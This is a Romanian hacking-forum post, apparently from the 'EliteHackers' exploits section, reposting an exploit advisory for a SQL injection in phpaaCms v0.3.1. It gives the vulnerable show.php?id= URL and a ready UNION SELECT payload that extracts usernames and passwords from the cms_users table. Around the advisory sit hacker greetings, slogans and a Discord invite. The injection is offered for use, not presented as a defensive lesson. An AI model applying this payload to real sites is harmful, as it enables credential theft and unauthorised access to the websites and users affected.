phpaaCms v0 3 1 show php id SQL Injection Vulnerability

EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.

Lista Forumurilor Pe Tematici

EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat.

Nou pe simpatie:
Ada_net la Simpatie.ro

Femeie
25 ani
Bucuresti
cauta Barbat
25 - 47 ani

EliteHackers / Exploituri / phpaaCms v0.3.1 (show.php?id=) SQL Injection Vulnerability

Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, r3v

Autor

Mesaj

Pagini: 1

r3v
Moderator

Inregistrat: acum 16 ani
Postari: 1158

Code:

#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable 
# Software http://www.phpaa.cn 
# Tested on: win 7 
# category: webapp 
# Code : n/a 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
    
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
       Gr33tz to  All PakISTANI Hackers  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
   
  
   
----- [ Founder ] ----- 
   
    Shafiq-Ur-rehman 
   
----- [ Email] ----- 
   
      
   
   
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
   
 {{{{TITLE}}} 
   
PHPAA (show.php) Sql injection Vulnerable 
   
+++++[ Vendor ]+++++ 
   
http://www.phpaa.cn 
   
                                                          
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
  
   
----- [ SQL Injection ] ----- 
   
Put [SQL CODE] 
   
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE] 
   
  
  
             {Tested On} 
   
----- [ Live Link (s) ] ----- 
   
[SQLi] http://<server>/show.php?id=1

Code:

[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users-- 
   
  
   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members|  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com 
   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
     >>Live Long Pakistan<< 
   
>>> Live Long Azad Kashmir<<< 
   
>>> Proude To Be A Kashmiri+Pakistani<<< 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
   
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010

_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin

pus acum 15 ani

Pagini: 1

Mergi la